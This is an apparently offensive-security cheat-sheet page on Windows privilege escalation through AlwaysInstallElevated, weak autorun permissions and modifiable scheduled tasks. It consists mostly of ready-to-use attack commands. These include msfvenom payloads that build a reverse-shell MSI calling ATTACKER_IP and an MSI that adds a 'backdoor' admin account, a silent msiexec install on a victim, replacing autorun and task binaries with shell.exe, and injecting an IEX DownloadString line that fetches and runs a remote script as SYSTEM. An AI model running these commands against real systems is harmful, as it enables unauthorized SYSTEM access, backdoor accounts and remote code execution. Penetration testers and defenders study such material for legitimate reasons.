> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Misconfigurations

> Privilege escalation via Windows misconfigurations: AlwaysInstallElevated, autorun, and scheduled tasks.

## AlwaysInstallElevated

If enabled, any `.msi` installs as SYSTEM.

### Check

Both keys must be set to `1`:

```cmd theme={"dark"}
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

```powershell theme={"dark"}
. .\PowerUp.ps1
Get-RegistryAlwaysInstallElevated
```

### Exploit — Reverse Shell MSI

```bash theme={"dark"}
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f msi -o shell.msi
```

Install on victim:

```cmd theme={"dark"}
msiexec /quiet /qn /i shell.msi
```

### Exploit — Add Admin User

```bash theme={"dark"}
msfvenom -p windows/adduser USER=backdoor PASS=P@ssw0rd123! -f msi -o adduser.msi
```

***

## Autorun with Weak Permissions

### Find Autorun Entries

```cmd theme={"dark"}
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```

```powershell theme={"dark"}
Get-CimInstance Win32_StartupCommand | Select Name, Command, Location
```

### Check Permissions on Autorun Binaries

```cmd theme={"dark"}
icacls "C:\Path\to\autorun.exe"
```

```cmd theme={"dark"}
accesschk.exe /accepteula -wvu "C:\Path\to\autorun.exe"
```

If writable → replace binary, wait for reboot or user login:

```cmd theme={"dark"}
copy shell.exe "C:\Path\to\autorun.exe"
```

***

## Modifiable Scheduled Tasks

### Enumerate Scheduled Tasks

```cmd theme={"dark"}
schtasks /query /fo LIST /v
```

```powershell theme={"dark"}
Get-ScheduledTask | Where-Object { $_.State -eq "Ready" } | ForEach-Object {
    $_ | Select TaskName, @{N="Action";E={$_.Actions.Execute}}, @{N="RunAs";E={$_.Principal.UserId}}
}
```

### Find Tasks Running as SYSTEM

```powershell theme={"dark"}
Get-ScheduledTask | ForEach-Object {
    $info = $_ | Get-ScheduledTaskInfo -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        Name   = $_.TaskName
        Action = $_.Actions.Execute
        RunAs  = $_.Principal.UserId
    }
} | Where-Object { $_.RunAs -match "SYSTEM|Administrator" }
```

### Check Script/Binary Permissions

```cmd theme={"dark"}
icacls "C:\Path\to\scheduled_script.ps1"
```

If writable → inject payload:

```powershell theme={"dark"}
# Append reverse shell to existing script
Add-Content "C:\Path\to\scheduled_script.ps1" "`nIEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"
```

Or replace entirely:

```cmd theme={"dark"}
copy shell.exe "C:\Path\to\scheduled_binary.exe"
```

### Check Folder Permissions

If the script's directory is writable and binary is missing:

```cmd theme={"dark"}
icacls "C:\Path\to\task_folder\"
```

Drop payload with expected filename.
